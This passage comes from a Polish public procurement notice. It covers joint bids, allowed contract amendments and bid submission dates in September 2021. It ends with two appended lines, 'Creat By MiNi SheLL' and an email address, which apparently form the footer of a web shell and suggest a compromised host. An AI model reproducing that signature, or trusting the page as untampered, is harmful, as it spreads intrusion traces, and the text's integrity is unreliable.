zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>2. Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności<br/>wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. Zamawiający nie określa sposobu spełniania warunków udziału w postępowaniu przez<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument<br/>”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa<br/>w pkt. 10.1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy wymagają zgody obu Stron i zachowania formy pisemnej pod<br/>rygorem nieważności.<br/>2. Zmiany Umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu<br/>art. 454 oraz 455 ustawy Prawo zamówień publicznych.<br/>3. Dopuszcza się możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty<br/>Wykonawcy w następującym zakresie:<br/>a) terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana:<br/>epidemią stwierdzona przez uprawnione do tego organy lokalne lub państwowe, klęską<br/>żywiołową, strajkiem lub stanem wyjątkowym,<br/>następstwem okoliczności leżących po stronie Zamawiającego lub przeszkodami dającymi się<br/>przypisać Zamawiającemu,<br/>następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na<br/>realizację przedmiotu zamówienia.<br/>b) osób przewidzianych do realizacji zamówienia przez Strony pod warunkiem, że osoby<br/>zaproponowane będą posiadały co najmniej takie uprawnienia, które potwierdzają spełnienie<br/>warunku w stopniu nie mniejszym niż wymagany w trakcie postepowania o udzielenie<br/>zamówienia w zakresie osób,<br/>c) powierzenie określonego zakresu podwykonawcy lub zmiany zakresu części prac<br/>powierzonych podwykonawcy w przypadku gdy:<br/>− wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia,<br/>d) zmiany albo rezygnacji z podwykonawcy jeżeli dotyczy podmiotu, na którego zasoby<br/>Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b Pzp, w celu wykazania<br/>spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Pzp. Wykonawca<br/>jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub<br/>Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie<br/>postępowania o udzielenie zamówienia,<br/>e) ograniczenia zakresu prac objętych niniejszą umową w przypadku stwierdzenia braku<br/>konieczności wykonywania części zamówienia.<br/>f) terminów realizacji ze względu na przyczyny leżące po stronie Zamawiającego, dotyczące w<br/>szczególności braku środków przeznaczonych na realizację zamówienia (np.<br/>cofnięcie/wstrzymanie wynikające z decyzji organów władzy publicznej), kluczowych zmian w<br/>harmonogramie projektu mających na celu zapewnienie prawidłowej realizacji projektu,<br/>wynikających z procesu rekrutacji uczestników zajęć, oraz inne niezawinione przez Strony<br/>przyczyny, w tym będące konsekwencją zaistnienia zdarzeń spowodowanych przez siłę wyższą<br/>rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do<br/>przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej<br/>staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub<br/>części. W razie wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich<br/>starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań<br/>umownych, powstałego na skutek działania siły wyższej. O zmianie terminu Zamawiający<br/>powiadomi pisemnie Wykonawcę ze stosownym wyprzedzeniem.<br/>g) gdy nastąpiła zmiana przepisów prawa powszechnie obowiązującego, która ma wpływ na<br/>termin, sposób lub zakres realizacji przedmiotu umowy.<br/>h) urzędowej zmiany wysokości stawki podatku VAT poprzez wprowadzenie nowej stawki VAT<br/>dla towarów, których ta zmiana będzie dotyczyć i zmiany wynagrodzenia brutto wynikającej ze<br/>zmiany stawki podatku.<br/>4. Warunkiem dokonania zmian, o których mowa w ust. 3 jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian, obliczenie<br/>kosztów zmian, jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-01 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-01 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com